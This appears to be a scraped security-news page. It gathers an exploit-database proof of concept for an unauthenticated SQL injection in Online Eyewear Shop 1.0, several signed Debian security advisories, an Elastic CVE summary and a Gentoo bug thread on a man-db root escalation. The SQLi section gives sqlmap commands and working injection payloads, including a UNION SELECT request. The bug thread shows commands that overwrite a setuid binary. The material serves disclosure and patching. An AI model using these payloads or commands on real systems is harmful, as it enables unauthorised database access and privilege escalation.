Online Eyewear Shop version 1.0 suffers from a remote SQL injection vulnerability.

    # Exploit Title: Online Eyewear Shop 1.0 - Product detail 'id' SQL Injection (Unauthenticated)# Date: 2023-01-02# Exploit Author: Muhammad Navaid Zafar Ansari# Vendor Homepage: https://www.sourcecodester.com/php/16089/online-eyewear-shop-website-using-php-and-mysql-free-download.html# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/php-oews.zip# Version: 1.0# Tested on: Kali Linux + PHP 8.2.1, Apache 2.4.55 (Debian)# CVE: Not Assigned Yet# References: -------------------------------------------------------------------------------------1. Description:----------------------Online Eyewear Shop 1.0 allows Unauthenticated SQL Injection via parameter 'id' in 'oews/?p=products/view_product&id=?'  Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.2. Proof of Concept:----------------------Step 1 - By visiting the url: http://localhost/oews/?p=products/view_product&id=5 just add single quote to verify the SQL Injection.Step 2 - Run sqlmap -u "http://localhost/oews/?p=products/view_product&id=3" -p id --dbms=mysqlSQLMap Response:[*] starting @ 04:49:58 /2023-02-01/[04:49:58] [INFO] testing connection to the target URLyou have not declared cookie(s), while server wants to set its own ('PHPSESSID=ft4vh3vs87t...s4nu5kh7ik'). Do you want to use those [Y/n] nsqlmap resumed the following injection point(s) from stored session:---Parameter: id (GET)    Type: boolean-based blind    Title: AND boolean-based blind - WHERE or HAVING clause    Payload: p=products/view_product&id=3' AND 4759=4759 AND 'oKly'='oKly    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: p=products/view_product&id=3' AND (SELECT 5509 FROM (SELECT(SLEEP(5)))KaYM) AND 'phDK'='phDK---[04:50:00] [INFO] testing MySQL[04:50:00] [INFO] confirming MySQL[04:50:00] [INFO] the back-end DBMS is MySQLweb server operating system: Linux Debianweb application technology: Apache 2.4.55, PHPback-end DBMS: MySQL >= 5.0.0 (MariaDB fork)3. Example payload:----------------------(boolean-based)' AND 1=1 AND 'test'='test4. Burpsuite request:----------------------GET /oews/?p=products/view_product&id=5%27+and+0+union+select+1,2,user(),4,5,6,7,8,9,10,11,12,version(),14--+- HTTP/1.1Host: localhostsec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Linux"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=g491mrrn2ntmqa9akheqr3ujipConnection: close

Online Eyewear Shop 1.0 SQL Injection

Debian Linux Security Advisory 5334-1 - Martin van Kervel Smedshammer discovered that varnish, a state of the art, high-performance web accelerator, is prone to a HTTP/2 request forgery vulnerability.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5334-1                   security@debian.orghttps://www.debian.org/security/                     Salvatore BonaccorsoJanuary 29, 2023                      https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : varnishCVE ID         : CVE-2022-45060Debian Bug     : 1023751Martin van Kervel Smedshammer discovered that varnish, a state of theart, high-performance web accelerator, is prone to a HTTP/2 requestforgery vulnerability.See https://varnish-cache.org/security/VSV00011.html for details.For the stable distribution (bullseye), this problem has been fixed inversion 6.5.1-1+deb11u3.We recommend that you upgrade your varnish packages.For the detailed security status of varnish please refer to its securitytracker page at:https://security-tracker.debian.org/tracker/varnishFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmPW4PxfFIAAAAAALgAoaXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xNDz0R2Xw//ezfXNoVdUw/N3ym0RS/2RBEjxmyC4tSBihh9xNV/rMr4ez/CqNC5iH2mRYBjcEopyKZpuPiakY3eQC8Erk5TPo4Ky4zv9WPCyzV7a/nBe+bTdkL5VKciouS/tG2B4tHaCTy3oGf6gUV3hJOruNDtJCFxpl3hfADT95wIZ9rKZpP4eSJ7YvU1Sml4ZUenM73WbNP6UUzXXEcpfZbvraBs4l+SDxHrUR4t3MRAX0KXgXPVGD7dhb14A8XKfLX+I7TS6tOgVApagnaH8xCY6+gk3UCyzgWmCkITCvYZOyYNHBoB1hHbIxvJ9PhhKimdMpEwKjGNM+g974j4uOlLQlHDYo0dZIIncBICjbvB/7BgiictilcgcwcnlCofXqroJwzQS/B1K0Pk8tc6Ok/xt9k2QqRru8vYI8CcgxcdpfkVodgnPU/bSbq6a8gFNY4ZJQzVPbcg0Yjw7T0pzZjTnGpBchywzCf2ZOxVyeTNhSCEryhahYuYAJJR029fhPP4brhV0taAthorwc/AdNSdUHnO+2rrcEgpUuBArBku7n4f4dtSixcnWtr9IFDbxW3wr3LINgdNQAtPxlJuMdaI83eeTFMETztROhBt9SGI88Cn0UUC026hs5Osy+m6aHaRq6wAyqjlcf72NDIlu6UAAtc60yUvTIH9VvNKuPr6fQXbEUw==wFUO-----END PGP SIGNATURE-----

Debian Security Advisory 5334-1

Debian Linux Security Advisory 5332-1 - Multiple issues were found in Git, a distributed revision control system. An attacker may trigger remote code execution, cause local users into executing arbitrary commands, leak information from the local filesystem, and bypass restricted shell.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA256- -------------------------------------------------------------------------Debian Security Advisory DSA-5332-1                   security@debian.orghttps://www.debian.org/security/                                  Aron XuJanuary 29, 2023                      https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : gitCVE ID         : CVE-2022-23521 CVE-2022-24765 CVE-2022-29187 CVE-2022-39253                  CVE-2022-39260 CVE-2022-41903Debian Bug     : 1014848 1022046 1029114Multiple issues were found in Git, a distributed revision control system.An attacker may trigger remote code execution, cause local users intoexecuting arbitrary commands, leak information from the local filesystem,and bypass restricted shell.This update includes two changes of behavior that may affect certain setup:  - It stops when directory traversal changes ownership from the current    user while looking for a top-level git directory, a user could make an    exception by using the new safe.directory configuration.  - The default of protocol.file.allow has been changed from "always" to    "user".For the stable distribution (bullseye), these problems have been fixed inversion 1:2.30.2-1+deb11u1.We recommend that you upgrade your git packages.For the detailed security status of git please refer toits security tracker page at:https://security-tracker.debian.org/tracker/gitFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQEzBAEBCAAdFiEEhhz+aYQl/Bp4OTA7O1LKKgqv2VQFAmPWoBQACgkQO1LKKgqv2VQ9Ugf/amidAHmXSaPDpk9Hs52ttiUPJ6uMJRYyJI/KQ3o5eoQfdzYmVT9ACsuKXxT7Xd5JqkHZMJyABeqm42JJgOiyV5GUx2ZrsQ3M5UE2HD2keWxaJmrkj6VlzkFsqHOynAgprllBmw3RfHkyjybQEG4dtmiLk5+gJZK0MYxAaKzyeNi7dnLEllYOf+Xidn3aSk8edTVqT80jdMIfBeOn1f/Zb+9kSHyVOezku1NfYES1dnA7RaOAkKmw/JkRHYnuxpdAfkb2K1z6LmDkLWpTQU7CbOPcPpWBWgkuD6tQmKjppx5MYuDZ+hW0y6aVEI1gHfi7qbZ3+b+nxEa9CTvap0d8QA===Vh4D-----END PGP SIGNATURE-----

Debian Security Advisory 5332-1

Debian Linux Security Advisory 5333-1 - Several buffer overflow, divide by zero or out of bounds read/write vulnerabilities were discovered in tiff, the Tag Image File Format (TIFF) library and tools, which may cause denial of service when processing a crafted TIFF image.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA256- -------------------------------------------------------------------------Debian Security Advisory DSA-5333-1                   security@debian.orghttps://www.debian.org/security/                                  Aron XuJanuary 29, 2023                      https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : tiffCVE ID         : CVE-2022-1354 CVE-2022-1355 CVE-2022-1622 CVE-2022-1623                  CVE-2022-2056 CVE-2022-2057 CVE-2022-2058 CVE-2022-2519                  CVE-2022-2520 CVE-2022-2521 CVE-2022-2867 CVE-2022-2868                  CVE-2022-2869 CVE-2022-2953 CVE-2022-3570 CVE-2022-3597                  CVE-2022-3599 CVE-2022-3627 CVE-2022-3636 CVE-2022-34526                 CVE-2022-48281Debian Bug     : 1011160 1014494 1022555 1024737 1029653Several buffer overflow, divide by zero or out of bounds read/writevulnerabilities were discovered in tiff, the Tag Image File Format (TIFF)library and tools, which may cause denial of service when processing acrafted TIFF image.For the stable distribution (bullseye), these problems have been fixed inversion 4.2.0-1+deb11u3.We recommend that you upgrade your tiff packages.For the detailed security status of tiff please refer toits security tracker page at:https://security-tracker.debian.org/tracker/tiffFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQEzBAEBCAAdFiEEhhz+aYQl/Bp4OTA7O1LKKgqv2VQFAmPWbCMACgkQO1LKKgqv2VSytwgAhwPmD658VKUyf76i4kD+dO2fioMClzNZNZgXz9CxWPn18j67dphNDQkxK3b/Vd9n/FMnmi7hApNdUtEXdorq0355UIT4tI6IMxuywEdAou4vCl83KXx7a6xRHgzap+e+fRma3TS3NvlrvnXm02RMvULEo/QVs2/5B/cxmaPDEFpKzwXoQwO87OzifK7W6LkH6GqhC/cgGoIFjR8n9EBVY6BBzgbardsrxVElspQNrfeKg1O5L7Y26ql9bp8YwMpEfSPxX69u/75xGiT3fQpMiGsLUEUAOrGynZH1jtyTPPzGDMd+VG1S8fQUvZ+ZLnm2nAHBx+1YaGZNBcW8ocY2jA===NMoP-----END PGP SIGNATURE-----

Debian Security Advisory 5333-1

Debian Linux Security Advisory 5331-1 - Several vulnerabilities have been discovered in the OpenJDK Java runtime, which may result in denial of service or spoofing.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5331-1                   security@debian.org  
https://www.debian.org/security/                       Moritz Muehlenhoff  
January 28, 2023                      https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : openjdk-11  
CVE ID         : CVE-2022-21619 CVE-2022-21624 CVE-2022-21626 CVE-2022-21628   
                 CVE-2022-39399 CVE-2023-21835 CVE-2023-21843

Several vulnerabilities have been discovered in the OpenJDK Java runtime,  
which may result in denial of service or spoofing.

For the stable distribution (bullseye), these problems have been fixed in  
version 11.0.18+10-1~deb11u1.

We recommend that you upgrade your openjdk-11 packages.

For the detailed security status of openjdk-11 please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/openjdk-11

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmPVXJgACgkQEMKTtsN8  
TjaDFA//fTs6b0krISKRClpErRG2nD2pvTm4uvGwYuRD6hZ+IZS+IXd6/sneGnTE  
KwmYRpzdgX8Kowx036816UXyBY62iQDy/sX7hD76MGh7dI4xKhZzsbLxGlaQICIC  
HEuV3i7SSeZ8Qlgzo0s1S+MYaiEU3Uj7w/hgPdw840NGgMJnrl5Xl9R2ftTDES/h  
uXErDccwvmi+zYY64mH44Utrp1aU7VTWYBK33kkGDgIC12qRk5Vtw1BcPTFHZ37g  
98rVHDZ9XikCBC+SrBDLC3wVB+Fj+YFhgAR3GYgmkMxcTDU6Awh10tpJc2d2XpQS  
QbQYNVFYk9y85wZnyvJ8r8BUIr1UPgp04RjjMyrpmnMMkAp0cXXw07gmllqzWB98  
A/3GpXwlUtvZl8BSdwD3hawCfGUfUeISZO3NeLr0NjDfj4GQuVFmhsI13TGJV8ip  
BdzAaREG3UwxS1DmQH3dHQkZ/tOaouHYrSczympUfjVTwsCaSqHBdtlYesC0t1By  
I5F3FLBqdLy2Gs9KLn8ef8BN2ecc3bMTz4wrhuKYuqa0qsKmyRLl58XyJ+8NsFSf  
JUxXn8B+6kI+OiDJSITUr87+YGGOdsY/WvcVOeL+fXcQpSV/3S0KrTRkZ/xhUjhJ  
lngIcYUBe4/65INSpXCFb4LSKC6N5JKH3ro7iUN589gaOSvRPE0=  
=HU+A  
-----END PGP SIGNATURE-----

Debian Security Advisory 5331-1

Debian Linux Security Advisory 5330-1 - Two vulnerabilities were discovered in Curl, an easy-to-use client-side URL transfer library, which could result in denial of service or information disclosure.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5330-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffJanuary 27, 2023                      https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : curlCVE ID         : CVE-2022-32221 CVE-2022-43552Two vulnerabilities were discovered in Curl, an easy-to-use client-sideURL transfer library, which could result in denial of service orinformation disclosure.For the stable distribution (bullseye), these problems have been fixed inversion 7.74.0-1.3+deb11u5. This update also revises the fix forCVE-2022-27774 released in DSA-5197-1.We recommend that you upgrade your curl packages.For the detailed security status of curl please refer toits security tracker page at:https://security-tracker.debian.org/tracker/curlFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmPUCUkACgkQEMKTtsN8TjaA3g/8DBSNCu0gAsoqGfSGx42C4GDMKJBZKiW92bIVKuuJ+1Pq1VQ6msVdmOgCL/i1YFwFaxqPPQWnQQWBDNXn1oYpkVXop+Yq3ETsiX6bpF0+TCXBZRY9KsuSYyzniky7f1ueJAFjqTHWdJ/J5nfSrYSdQ/UIDNKsO2dFTD3uq1W5+qStVAdxnSOh9pMY5XgMh27urtZttTdyL+no+lRkK2jS2Ru8SgMCCmGsfUn7gFtxHn8Aqd2WEQQ9AsmgJkBjvZI2hhHqTBc96ZiTYCH6gjQHyGnRrRaZe0nZWyeSFJ8N8mblD1xequma5nPlWy5t0kKcOMVr6HvaNDbHLd51WoO9e0htjBmZXdmeEeudvkGKg00d1cPlwWmihegeuaiMHYUR/aCW1wko6FNsJ2yOZDY5iGjNNZHydrokcfB8DV/QGlFLFRXusUdX51bfylMCx1vddLTB5NQeQ7q0+eB2Rq5kM0KqdX1gsuq9id5NGSeZR/yjNPPEHbJKu2RFRridvY1H6kn2mB7YGYDGLjT/hYkoEXrBcrzPXEpBwKzsu4ih1C9eFW8DhK+iPD/U765dRV/UWIyk8uJHFmqfd4OqvG0ssVxYW5SraeOCVhToiA/vyB1mIOhYMWAitssG5xQ/DH8+4NQkGAc2Rmh4aQ6hB7QZst1+Ztqgpkcr1fods9de51k==EDu7-----END PGP SIGNATURE-----

Debian Security Advisory 5330-1

Debian Linux Security Advisory 5328-1 - Multiple security issues were discovered in Chromium, which could result in the execution of arbitrary code, denial of service or information disclosure.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5328-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffJanuary 26, 2023                      https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : chromiumCVE ID         : CVE-2023-0471 CVE-2023-0472 CVE-2023-0473 CVE-2023-0474Debian Bug     : 1011346Multiple security issues were discovered in Chromium, which could resultin the execution of arbitrary code, denial of service or informationdisclosure.For the stable distribution (bullseye), these problems have been fixed inversion 109.0.5414.119-1~deb11u1.We recommend that you upgrade your chromium packages.For the detailed security status of chromium please refer toits security tracker page at:https://security-tracker.debian.org/tracker/chromiumFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmPSxfAACgkQEMKTtsN8TjZlkQ/+PGr18MyY4Su8U78MrneB965DP5Q/faHnU/AIERZ99dkb9XkuKR7icqaUh3AdyK7fN1wz/cG/sAFa2MoFsL/tcGS0SmpZsNRdbQy6mbpYO/5yQrqW2+msvpmT/uNMCpMn9+8K2L0+yuuDCkL9KhuHZRg3UrN8T3xfkU2rebxRslvQixy9a5M8cQ+wAP4TrsKiyIRaBBrJNPE4BjKGOFYQmZn9Ov8iRMaApXgSzO7RV9ocMKbtWz5n7m6cTfpq4vOuLkugnYa/J3Xn5PozT1O8qTcru3i6CFOow/v/YEHjw2DYd42NmA+Ojon0nBPPwShPbZndJrNvloeYyrcHHf7Em330b71gtip3ri9QfenPAaJgfdJ4mIpdyDJ/rZiH4oNbkilZrlgLM4Sw/JUh2jQ8tDK2udVWyH10uYS3teGDSq/EIU3ZInKGzlez7j7ZzQuAgwTwHwwlezD4Ppr02Zuu5lvVvOSfkjE5IQnyUNb/VWGd28oN6PKq4OgMYAOPVJFPy6dvs+YR2zCJKkZBCtfeJM8lO8Ncq/gs80SKtWDibmD/lRVbVotoGoNCebFVPeoeNXgWjGb3WC6PLDBoLc/GCxqFPoNxU8y1gKi5SdcMEqLTUIjH1f8BX28c9ZZmWgpZdctavsRH5mdRgsz6kb78bWbMQYqj1sVPPufZjOF5AfQ==PFa0-----END PGP SIGNATURE-----

Debian Security Advisory 5328-1

Debian Linux Security Advisory 5329-1 - Several vulnerabilities were discovered in BIND, a DNS server implementation, which may result in denial of service against named.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5329-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffJanuary 26, 2023                      https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : bind9CVE ID         : CVE-2022-3094 CVE-2022-3736 CVE-2022-3924Several vulnerabilities were discovered in BIND, a DNS serverimplementation, which may result in denial of service against named.For the stable distribution (bullseye), these problems have been fixed inversion 1:9.16.37-1~deb11u1.We recommend that you upgrade your bind9 packages.For the detailed security status of bind9 please refer toits security tracker page at:https://security-tracker.debian.org/tracker/bind9Further information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmPSxg4ACgkQEMKTtsN8TjaEyw//bjGBSD6QFX5xfkXzm4fHKEBnl3/yg0z+p6ml3xGQQJaBzwljn4J2McGxxtCsgOVTyyvy/uocUsK4X1LZk8kGfbbiGN+63o2PoADX76bPhbv69CiRxd1NRnprSMLsJyBHaiB8TFPFBnPz//Q7KY9KvhzUbv/g4ocIYmlrxUZiZmmyJB8kJ3lzFJIBzThlcmnCLHjs4IDF516BJMywxYnsnSRc0G73jB1zlcmBB0loYpD3U434C+pUCMKkrpYPeBFZHGikpYs7x+lJ95WmggYtoNjz0iPwpK1hd2vvM1rxr93jARKMTlKh5OMtljIK67NQeKfyojd4Uva49SAVYuo38MCLO2H4NEPPoEh+OGUJBgCagvwgye+GPOM+c++Ii9LNqNdwEThG2WVVP4f/Hore27l4lswGICLk9662lSJsAnZtdTQUSvFbeI8k8ne/2bvYrkZbCWDv8gPhLlCa6c80zag+ZzhOAvghBfj7AbRch/7feqe+RYAJ4qPuHmEokpxGL9gboa/4y3YJeCSKv13xXbz13FJyPMpsfiLVCp6ajhE1iVL3Trkr4rUGGmQVXClsBrDibeIu5YQvqnBtTZckrt8WoKo7GedrZxu/vrAqtwQVsL+7UrNUQbZLcTTLwZRc/RRegsHBqptYu/+joV+8ndQ9G2wX/35ss8hd+uQ2wvE==/JXy-----END PGP SIGNATURE-----

Debian Security Advisory 5329-1

An issue was discovered in the rollback feature of Elastic Endpoint Security for Windows, which could allow unprivileged users to elevate their privileges to those of the LocalSystem account.

CVE-2022-38775: Security issues

man-db before 2.8.5 on Gentoo allows local users (with access to the man user account) to gain root privileges because /usr/bin/mandb is executed by root but not owned by root. (Also, the owner can strip the setuid and setgid bits.)

Description Michael Orlitzky  2018-07-29 20:42:23 UTC

Our sys-apps/man-db package installs the /usr/bin/mandb program setuid and setgid with owner/group "man". We also install a daily cron job from ${FILESDIR}/man-db.cron that runs as root and executes,

  exec nice mandb --quiet

This can be exploited by the "man" user to gain root privileges. For example, the "man" user can simply strip off the setuid/setgid bits:

  # su man -s /bin/sh -c 'chmod 755 /usr/bin/mandb'

Now when "mandb" is run in the cron job, it will run with root privileges. But the owner of /usr/bin/mandb has not changed, so the "man" user can write to it because he owns it:

  # su man -s /bin/sh -c 'cat < bad-script.sh > /usr/bin/mandb'

Whenever the cron job runs again, the "man" user gains root.

Comment 1 Thomas Deutschmann (RETIRED)  2018-07-29 22:25:48 UTC

Mh, this sounds like bug 602588...

Comment 2 Michael Orlitzky  2018-07-29 23:06:50 UTC

(In reply to Thomas Deutschmann from comment #1)
\> Mh, this sounds like bug 602588...

I saw that, but the gist of this one is more "the executable shouldn't be owned by 'man' to begin with." The fact that the cron job makes it easy to exploit is only adding insult to injury. If root (or another privileged user) was ever going to run /usr/bin/mandb for any reason, then the "man" user could swap out its contents beforehand.

Comment 4 Colin Watson 2018-09-17 13:00:04 UTC

I don't think those commits are especially related, except perhaps insofar as they describe existing practice.

This sort of thing is indeed a problem with having setuid-to-non-root executables that might be run as root: such a setup inherently means that root has to trust the user that owns the executable.  I can see a few non-exclusive options:

 1) Make mandb setuid root instead, and add code at the start of main() (or maybe in init\_security() or something) to drop to MAN\_OWNER if necessary.
 2) Mitigate the bug by making the cron job run as the man user rather than root; at least then it isn't \*guaranteed\* that mandb will be run as root.  (Note that Debian's cron jobs have run as the man user for at least 17 years.)
 3) Stop installing mandb setuid by default.

Option 1 might be a good idea, and is probably the only way to preserve the setuid setup while immunising against this bug.  On the other hand, it adds a bit more attack surface and would have to be done carefully.

Option 2 seems to have no obvious downsides.  Assuming it works in the Gentoo setup, you surely ought to do this even if it isn't a complete fix for this bug.

Option 3 is almost certainly the right long-term fix.

Comment 6 Lars Wendler (Polynomial-C) (RETIRED)  2019-01-06 15:13:23 UTC

Michael, please check if this attempt is sufficient to get rid of this root escalation issue.

Comment 7 Michael Orlitzky  2019-01-06 16:09:49 UTC

(In reply to Lars Wendler (Polynomial-C) from comment #6)
\> Michael, please check if this attempt is sufficient to get rid of this root
> escalation issue.

In the past, I'm almost certain that portage would not change the owner or group of a file that already exists during merge. So, I was expecting /usr/bin/mandb to still be "man:man" after an upgrade.

Good news: it isn't!

Bad news: I don't know why, or if we can rely on that happening. I'm going to ask around to see if something changed in portage to make this reliable.


But the fix generally looks good to me. In the future you might want to create /var/cache/man in src\_install, so that you don't have to do it in both the cron job and pkg\_preinst, and you don't have to chown/chmod it every time (this can also be dangerous if /var/cache isn't owned by root).

Then, instead of the shell script cron job that we have now, you could put something simpler in /etc/cron.d:

  <minute> <hour> \* \* \* man mandb --quiet

Comment 8 Michael Orlitzky  2019-01-07 16:04:57 UTC

(In reply to Michael Orlitzky from comment #7)
\> 
> In the past, I'm almost certain that portage would not change the owner or
> group of a file that already exists during merge. So, I was expecting
> /usr/bin/mandb to still be "man:man" after an upgrade.
> 

This still happens for directories but not for files. I tested back to portage-2.3.6, so we'd best assume the simplest explanation: I'm remembering wrong, and the ownership of \*files\* will be updated.

Comment 9 Lars Wendler (Polynomial-C) (RETIRED)  2019-01-11 09:02:34 UTC

(In reply to Michael Orlitzky from comment #7)
\> 
> But the fix generally looks good to me. In the future you might want to
> create /var/cache/man in src\_install, so that you don't have to do it in
> both the cron job and pkg\_preinst, and you don't have to chown/chmod it
> every time (this can also be dangerous if /var/cache isn't owned by root).

No can do as this would put the content of /var/cache/man into the package's content which we wanna avoid (by doing it in pkg\_preinst).
 
\> Then, instead of the shell script cron job that we have now, you could put
> something simpler in /etc/cron.d:
> 
>   <minute> <hour> \* \* \* man mandb --quiet

That sounds like a good idea. Care to file a separate bug for that?

Tag

#debian